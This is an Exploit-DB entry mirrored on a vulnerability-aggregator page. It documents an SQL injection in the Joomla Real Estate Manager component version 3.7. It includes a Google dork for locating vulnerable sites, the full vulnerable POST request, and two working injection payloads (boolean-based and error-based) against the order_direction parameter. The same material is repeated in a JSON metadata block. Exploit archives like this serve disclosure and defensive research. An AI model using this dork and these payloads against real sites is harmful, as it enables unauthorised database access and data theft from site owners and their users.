Search...

Joomla Real Estate Manager Component 3.7 - SQL injection

2015-10-11T00:00:00

ID EDB-ID:38445
Type exploitdb
Reporter Omer Ramić
Modified 2015-10-11T00:00:00

Description

Joomla Real Estate Manager Component 3.7 - SQL injection. Webapps exploit for php platform

                                        
                                            # Description of component:
This Joomla component is perfect for independent estate agents, property
rental companies and agencies, hotel booking, hotel manage, motel booking,
motel manage.

##################################################################################################
# Exploit Title: [Joomla component com_realestatemanager - SQL injection]
# Google Dork: [inurl:option=com_realestatemanager]
# Date: [2015-10-10]
# Exploit Author: [Omer RamiÄ‡]
# Vendor Homepage: [http://ordasoft.com/]
# Software Link: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html]
# Version: [3.7] & probably all prior
#Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
##################################################################################################

#Multiple vulnerable parameters (POC given only for the first parametar):
Parameter_1: order_direction (POST)
Parameter_2: order_field (POST)


#The vulnerable parameters 1 & 2 are within the following request:
POST
/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://
[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
Cookie: security_level=0;
9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

order_direction=asc&order_field=price



#Vectors:
POC_1: order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE
7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS)
END))&order_field=price

POC_2: order_direction=asc,(SELECT 1841 FROM(SELECT
COUNT(*),CONCAT(0x716b787671,(SELECT
(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM

INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price


###################################
# Greets to Palestine from Bosnia          #
###################################

JSON Vulners Source

Initial Source

{"id": "EDB-ID:38445", "hash": "e472a712fafb44beccc8d958916f09b3", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla Real Estate Manager Component 3.7 - SQL injection", "description": "Joomla Real Estate Manager Component 3.7 - SQL injection. Webapps exploit for php platform", "published": "2015-10-11T00:00:00", "modified": "2015-10-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/38445/", "reporter": "Omer Rami\u0107", "references": [], "cvelist": [], "lastseen": "2016-02-04T08:06:53", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/38445/", "sourceData": "# Description of component:\r\nThis Joomla component is perfect for independent estate agents, property\r\nrental companies and agencies, hotel booking, hotel manage, motel booking,\r\nmotel manage.\r\n\r\n##################################################################################################\r\n# Exploit Title: [Joomla component com_realestatemanager - SQL injection]\r\n# Google Dork: [inurl:option=com_realestatemanager]\r\n# Date: [2015-10-10]\r\n# Exploit Author: [Omer Rami\u00c4\u2021]\r\n# Vendor Homepage: [http://ordasoft.com/]\r\n# Software Link: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html]\r\n# Version: [3.7] & probably all prior\r\n#Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16\r\n##################################################################################################\r\n\r\n#Multiple vulnerable parameters (POC given only for the first parametar):\r\nParameter_1: order_direction (POST)\r\nParameter_2: order_field (POST)\r\n\r\n\r\n#The vulnerable parameters 1 & 2 are within the following request:\r\nPOST\r\n/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132\r\nHTTP/1.1\r\nHost: [HOST]\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101\r\nFirefox/38.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://\r\n[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132\r\nCookie: security_level=0;\r\n9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 37\r\n\r\norder_direction=asc&order_field=price\r\n\r\n\r\n\r\n#Vectors:\r\nPOC_1: order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE\r\n7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS)\r\nEND))&order_field=price\r\n\r\nPOC_2: order_direction=asc,(SELECT 1841 FROM(SELECT\r\nCOUNT(*),CONCAT(0x716b787671,(SELECT\r\n(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM\r\n\r\nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price\r\n\r\n\r\n###################################\r\n# Greets to Palestine from Bosnia #\r\n###################################\r\n", "osvdbidlist": ["129623"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}